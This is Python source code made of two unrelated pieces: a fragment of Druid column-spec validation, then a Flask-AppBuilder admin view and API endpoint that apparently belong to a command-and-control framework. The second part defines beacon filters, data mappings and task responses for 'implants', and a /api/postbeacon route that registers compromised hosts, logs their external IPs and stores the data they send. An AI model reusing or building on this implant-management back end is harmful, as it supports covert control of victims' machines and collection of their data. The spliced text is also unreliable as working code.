ValueError("Dimension Spec does not contain `outputName`") if "dimension" not in dimension_spec: raise ValueError("Dimension Spec is missing `dimension`") # `outputName` should be the same as the `column_name` if dimension_spec["outputName"] != item.column_name: raise ValueError( "`outputName` [{}] unequal to `column_name` [{}]".format( dimension_spec["outputName"], item.column_name ) ) def post_update(self, item: "DruidColumnInlineView") -> None: item.refresh_metrics() def post_add(self, item: "DruidColumnInlineView") -> None: self.post_update(item)
class BeaconModelView(ModelView): datamodel = SQLAInterface(Beacon) base_permissions = [ 'can_list', 'can_show', 'can_add', 'can_edit', 'can_delete', 'can_post_beacon' ] edit_form_extra_fields = { 'beacon_filter': Field('Beacon Filter', widget=FilterBuilderWidget( beacon_filters=get_querybuilder_filters_json(), beacon_fields=get_all_beacon_fields_json()), validators=[validators.Required()], description=('Only incoming Beacon packets matching this ' 'filter will be processed')), 'beacon_data_mapping': Field('Beacon Data Mapping', widget=BeaconFieldsWidget(packet_fields=get_all_packet_fields(), beacon_fields=get_all_beacon_fields()), validators=[validators.Required(), BeaconDataMappingCheck()], description=('Extract message data based on the selected ' 'mapping schema')), 'response_data_type': SelectField( 'Response Type', choices=get_all_response_types(), description=( 'The protocol used for response messages to the implant'), widget=Select2Widget()), 'response_data_mapping': Field('Response Data Mapping', widget=ResponseFieldsWidget( packet_fields=get_all_packet_fields(), response_fields=get_all_task_fields()), validators=[validators.Required(), BeaconDataMappingCheck()], description=('Format response messages based on the selected ' 'mapping schema')) } add_form_extra_fields = { 'beacon_filter': Field('Beacon Filter', widget=FilterBuilderWidget( beacon_filters=get_querybuilder_filters_json()), validators=[validators.Required()], description=('Only incoming packets matching this filter will ' 'be processed as a Beacon')), 'beacon_data_mapping': Field( 'Beacon Data Mapping', widget=BeaconFieldsWidget(packet_fields=get_all_packet_fields(), beacon_fields=get_all_beacon_fields()), validators=[validators.Required(), BeaconDataMappingCheck()], description=( 'Extract message data based on the selected mapping schema')), 'response_data_type': SelectField( 'Response Type', choices=get_all_response_types(), description=( 'The protocol used for response messages to the implant'), widget=Select2Widget()), 'response_data_mapping': Field( 'Response Data Mapping', widget=ResponseFieldsWidget(packet_fields=get_all_packet_fields(), response_fields=get_all_task_fields()), validators=[validators.Required(), BeaconDataMappingCheck()], description=( 'Format reply messages based on the selected mapping schema')) } edit_columns = [ 'name', 'beacon_filter', 'beacon_data_mapping', 'response_data_type', 'response_data_mapping' ] add_columns = [ 'name', 'beacon_filter', 'beacon_data_mapping', 'response_data_type', 'response_data_mapping' ] list_columns = [ 'name', 'beacon_filter', 'beacon_data_mapping', 'response_data_type', 'response_data_mapping' ] show_fieldsets = [('Filter', { 'fields': ['name', 'beacon_filter'] }), ('Beacon Data Mapping', { 'fields': ['beacon_data_mapping'] }), ('Task Data Mapping', { 'fields': ['response_data_type', 'response_data_mapping'] })] description_columns = {'name': 'Simple name for easy reference'} @action("muldelete", "Delete", "Delete all Really?", "fa-trash") def muldelete(self, items): if isinstance(items, list): self.datamodel.delete_all(items) self.update_redirect() else: self.datamodel.delete(items) return redirect(self.get_redirect()) @expose_api(name='post_beacon', url='/api/postbeacon', methods=['POST']) @has_access_api def post_beacon(self): """API used to send captured beacons from LP to Controller""" beacon = json_to_beacon(request.data) # Check if implant already exists implant = db.session.query(Implant).filter_by( uuid=beacon['uuid']).first() if implant: # Update existing implant implant.last_beacon_received = datetime.now() implant.external_ip_address = beacon['external_ip_address'] db.session.commit() else: # Add new implant implant = Implant(uuid=beacon['uuid']) db.session.add(implant) db.session.commit() # Store beacon data if 'data' in beacon: beacon_data = beacon['data'] if beacon_data: datastore = DataStore(implant=[implant], timestamp=datetime.now()) if is_ascii(beacon_data): datastore.text_received = beacon_data else: datastore.data_received = beacon_data db.session.add(datastore) db.session.commit() http_return_code = 200 response = make_response('Success', http_return_code) return response